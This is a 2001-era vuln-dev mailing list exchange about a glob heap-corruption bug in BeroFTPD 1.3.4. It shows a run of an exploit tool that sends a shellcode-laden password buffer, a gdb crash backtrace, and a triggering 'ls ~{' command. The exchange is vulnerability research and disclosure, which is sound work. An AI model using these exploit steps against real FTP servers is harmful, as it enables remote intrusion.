re: Older BeroFTPD glob

From: KF (dotslash@snosoft.com)
Date: 01/02/70


Date: Thu, 01 Jan 1970 18:09:19 -0500
From: KF <dotslash@snosoft.com>
To: eduardo.cruz@tsg.com, vuln-dev@security-focus.com

In eduardos reply I did not find it clear that BeroFTPD 1.3.4 was or was
not vuln by default compile. I compiled it from the latest source on
the wu-ftpd.org ftp server. Bare with no patches I get the following
result... which was the same with earlier versions. Again I am on a ppc
linux box:

[root@ibook root]# java wuwarez 42424242 0 localhost anonymous
Shellcode is 44 bytes long
return is 42424242
Got Socket
Sleeping so that you can attach a debugger
220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003) ready.
Sending username
331 Guest login ok, send your complete e-mail address as password.
sending mal buffer as the passwd
;230 Guest login ok, access restrictions apply.
Populate Heap...needs more work
(program exit)
[root@ibook root]#

(This is what we saw when we attached the debugger)

[root@ibook src]# ps -ef | grep ftpd
ftp 2035 790 0 14:55 ? 00:00:00 ftpd:
localhost.localdomain: anonymous
[root@ibook src]# gdb ./ftpd 2035
Program received signal SIGSEGV, Segmentation fault.
0xfeb6cfc in free () from /lib/libc.so.6
(gdb) bt
#0 0xfeb6cfc in free () from /lib/libc.so.6
#1 0x10010b58 in blkfree (av0=0x42424242) at glob.c:604
#2 0x1000dd04 in yyparse () at ftpcmd.y:1246
#3 0x10002cac in main (argc=268566528, argv=0x7ffffc74,
envp=0x1003e828) at ftpd.c:1221
#4 0xfe5e308 in __libc_start_main () from /lib/libc.so.6

Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035

-KF

From: "Eduardo Cruz" <eduardo.cruz@tsg.com> <mailto:eduardo.cruz@tsg.com>
Date: Sun Dec 09, 2001 05:00:10 AM US/Pacific
To: "KF" <dotslash@snosoft.com> <mailto:dotslash@snosoft.com>,
<vuln-dev@security-focus.com> <mailto:vuln-dev@security-focus.com>
Subject: Re: Older BeroFTPD glob

Connected to localhost.
220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001)
ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have
any
230-unusual problems, please report them via e-mail to root@cimitarra
<mailto:root@cimitarra>
230-If you do have problems, please try using a dash (-) as the first
character
230-of your password -- this will turn off the continuation messages that
may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
550 Missing }
ftp>

just patch glob.c ur self, or use the mine already patched (attached).
And about the maintenance of beroftp, as far as i know is not being done
since years ago.
Anyway appart from the bugs derivating from vuftpd i dont see the point on
maintaining bero, i find it quite perfect like it is.

have fun